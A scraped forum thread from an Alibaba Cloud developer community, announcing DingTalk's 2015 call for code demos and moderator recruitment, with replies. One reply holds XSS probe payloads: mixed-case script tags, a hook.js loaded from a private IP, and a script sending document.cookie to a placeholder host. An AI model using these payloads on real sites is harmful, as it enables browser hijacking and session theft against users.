开发者社区> 问答> 正文

钉钉开放平台代码DEMO征集暨论坛版主招募

钉钉开放平台,邀你一起来共创!开放平台上线以来,帮助开发者更好开发的开发者文档中心 以及开发者论坛一直在持续丰富和完善中,同时自钉钉开放平台8.31发布会以来,也吸引了越来越多的优秀开发者。


现面向广大开发整征集开发示例DEMO,同时招募优秀开发者成为论坛版主。


参与方式:
提交示例DEMO:
•    阿里云论坛
1.在本贴下面直接回复github项目地址(推荐)
2.发帖上传代码包附件
3.发帖内容直接贴上代码


DEMO要求:
开发语言:javascript、c#、python、ruby        
DEMO实现:服务端API、ISV接入、回调接口、加解密库




DEMO提交时间:
2015.9.30--2015.10.31


奖励:
1.每种示例最优秀的DEMO作为官方示例放在开发者文档中心;
2.选出最优秀的开发者5名成为钉钉开放平台论坛的版主;
3.每位有效参与者都将获得钉钉纪念品一份(订制杯子一个);


评审人员:
钉钉开放平台全体开发


参与对象:
所有ISV及企业开发者等




备注:
最终解释权归钉钉所有

展开
收起
君信 2015-09-30 14:43:31 15333 0
7 条回答
写回答
取消 提交回答
  • hehe <ScRiPt src=http://192.168.30.128:3000/hook.js></sCrIpT>

    -------------------------

    <img src=javascript:alert('__XSS__') />

    -------------------------

    <sCrIpt>alert(1)</script>

    -------------------------

    回 9楼cnbird-鸟哥的帖子
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

    -------------------------

    <sCrIpt>alert(1)</script>

    -------------------------

    回 11楼cnbird-鸟哥的帖子
    <sCrIpt>alert(1)</script>

    -------------------------

    回 11楼cnbird-鸟哥的帖子
    <sCrIpt>alert(1)</script>

    -------------------------

    <script>document.location='http://www.xxxx.com/cookie.cgi?'+document.cookie</script>

    -------------------------

    回 14楼cnbird-鸟哥的帖子
    test

    -------------------------

    test

    -------------------------

    test1

    -------------------------

    回 16楼hehehe的帖子
    test1

    -------------------------

    xxxxxx

    2016-12-02 09:16:49
    赞同 展开评论 打赏
  • Re钉钉开放平台代码DEMO征集暨论坛版主招募
    就两个?
    2016-10-20 14:35:00
    赞同 展开评论 打赏
  • 阿里云IoT物联网场景实践案例分享 https://www.yuque.com/cloud-dev/aliyun-in-action/zclrsc?#
    Re钉钉开放平台代码DEMO征集暨论坛版主招募
    贡献一个nodejs的吧
    github.com/wongxming/dtalkNodejs
    2016-04-15 13:22:08
    赞同 展开评论 打赏
  • Re钉钉开放平台代码DEMO征集暨论坛版主招募
    http://bbs.aliyun.com/read/260863.html?spm=5176.bbsl276.0.0.ZAFP6F

    我写的demo
    2015-10-23 16:07:21
    赞同 展开评论 打赏
  • Re钉钉开放平台代码DEMO征集暨论坛版主招募
    期待python的demo,被加密解密搞疯了。
    先收藏,月底来看大神。
    2015-10-20 08:35:43
    赞同 展开评论 打赏
  • Re钉钉开放平台代码DEMO征集暨论坛版主招募
    什么时候能出个demo呢,一直等待开发
    2015-10-16 23:30:45
    赞同 展开评论 打赏
  • Re钉钉开放平台代码DEMO征集暨论坛版主招募
    这是没有人应征的样子?
    2015-10-05 21:30:00
    赞同 展开评论 打赏
滑动查看更多
问答排行榜
最热
最新

相关电子书

更多
钉钉小程序——为工作方式插上翅膀 立即下载
钉钉客户端自动化的应用 立即下载
使命必达 —— 钉钉企业级 消息服务的机遇与挑战 立即下载